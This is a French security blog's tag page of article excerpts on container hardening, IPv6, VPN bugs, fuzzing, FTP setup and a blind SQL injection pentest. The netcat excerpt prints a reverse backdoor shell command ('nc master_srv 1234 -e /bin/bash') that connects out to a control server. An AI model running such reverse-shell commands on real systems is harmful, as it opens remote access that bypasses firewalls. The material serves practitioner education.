Articles taggés ‘sécurité’
Linux Capabilities en environnement Docker/Kubernetes
Nous nous sommes intéressés récemment aux Linux Capabilities , dans le cadre de durcissement de containers Docker ou de cluster Kubernetes. Il existe de nombreuses références à ce sujet sur Internet et dépasse l'objet de cet article. Les Capabilities , intégrées aux Kernel Linux, permettent de décrire finement les droits nécessaires à un exécutable et sont référencées ici. Celles qui nous intéressent le ...
Offre: Securisation de cluster Kubernetes
De nombreuses entreprises utilisent Docker et Kubernetes pour déployer de façon moderne leurs applications. La question qu'elles se posent souvent est de savoir quel niveau de sécurité est défini par défaut, atteignable, voire inatteignable dans une architecture microservice. La bonne nouvelle est qu'il est possible de mettre en place une stratégie de défense en profondeur qui sera plus efficace qu'avec un cloud privé classique à base ...
Sécurité d’un container Docker
Nous sommes amenés à réaliser des études d'architecture incluant le volet sécurité sur des infrastructures PaaS privées ou publiques, à base de containers (ou conteneurs) Docker. De par nos expériences, nous avons établi une liste de points d'attention que nous partageons avec nos lecteurs : Confiance dans le Repository d'image de containers (tels que AWS ECS ou DockerHub) Sécurité de l'image (configuration et version des composants applicatifs notamment, mais aussi gestion des secrec) Gestion ...
Désactiver IPv6 sur Linux
Par défaut ipv6 est activé sur Linux ce qui peut augmenter la surface d'attaque des serveurs et nuire à la lisibilité de certaines commandes : randco@RANDCO-S002 ~ $ip address 1: lo: <LOOPBACK,UP,LOWER_UP> mtu 16436 qdisc noqueue state UNKNOWN link/loopback 00:00:00:00:00:00 brd 00:00:00:00:00:00 inet 127.0.0.1/8 scope host lo inet6 ::1/128 scope host valid_lft forever preferred_lft forever 2: eth0: <BROADCAST,MULTICAST,UP,LOWER_UP> mtu 1500 qdisc pfifo_fast state UNKNOWN qlen 1000 link/ether 00:01:c0:06:41:38 brd ff:ff:ff:ff:ff:ff inet6 fe80::201:c0ff:fe06:4138/64 scope link valid_lft forever preferred_lft forever 3: eth1: <BROADCAST,MULTICAST,UP,LOWER_UP> mtu 1500 qdisc pfifo_fast state ...
Netcat et « -e invalid option »
Il est souvent très utile de créer un reverse backdoor shell sur un serveur qui n'est pas accessible directement (par exemple derrière un firewall). C'est alors ce serveur qui lance une connexion sortante vers notre serveur de contrôle. Or sur certaines distributions (dont Ubuntu, Mint,etc..) netcat (ou "nc") ne dispose pas de l'option "-e" qui permet de lui attacher un shell (ou autre). On obtient alors ce message d'erreur : #nc master_srv 1234 -e /bin/bash nc: invalid option ...
[CheckPoint] Des paquets ICMP bypassent le VPN
Il vient de m'arriver un sale bug qui m'a occupé 2h lors d'une formation Checkpoint : autant en faire profiter tout le monde ! Lorsque la règle implicite "Accept ICMP requests" est activée (cf menu "Global properties"), les pings entre deux réseaux - reliés par un VPN - n'empruntent plus ce VPN !! Après avoir sniffé l'interface externe, on voit bien les paquets ICMP sortirent NATés et non encapsulés, comme si les règles VPN (basées sur la ...
Test d’intrusion et Blind SQL Injection
Cet article présente un extrait issu d’un test d’intrusion pratiqué par notre équipe sécurité. A partir de vulnérabilités découvertes sur un site Apache, qui peuvent paraître inoffensives à première vue, nous allons voir comment un hacker va en prendre possession et lui faire exécuter du code arbitraire. Nous démontrerons ainsi les conséquences qu’engendre une mauvaise configuration de serveur web sous linux, le risque restant équivalent pour tout autre système d’exploitation. Nous terminerons ensuite par une mesure ...
wfuzz, un fuzzer HTTP
C'est un outil assez récent puisque publié le 18 Octobre 2007. Ecrit en python, "wfuzz" ( http://www.edge-security.com/wfuzz.php ) est un "Fuzzer". "Fuzzer" est une technique de test qualité qui consiste à injecter massivement et de manière automatisée des données aléatoires sans a priori (du "fuzz") en entrée d'un programme. Ainsi, si un crash intervient, le défaut peut être noté puis corrigé. En quoi cela peut-il nous être utile ? Dans nos activités de sécurité, ce type ...
Apple se moque de la sécurité de Vista
La nouvelle campagne publicitaire d'Apple, se moque gentiment d'un des nouveaux mécanismes de sécurité introduit dans Vista : UAC (User Access Control). Le but d'UAC (Pour plus de détails, se référer au Windows Vista Security Guide) est de séparer les privilèges nécessaires à l'utilisation quotidienne (modification du fuseau horaire -mais pas de l'heure système-, configuration d'un accès Wifi, installation de programmes ou codes mobiles - ...
Installation sécurisée de proftpd
Le but est d'installer un serveur FTP sécurisé permettant à l'utilisateur toto (et uniquement lui) de pouvoir se connecter et pousser ou récupérer des fichiers dans son propre répertoire. On installe d'abord le package proftpd : apt-get install proftpd On modifie (ou on ajoute) les lignes suivantes dans le fichier de configuration /etc/proftpd.conf : ## Pas de détails sur la version ServerName ...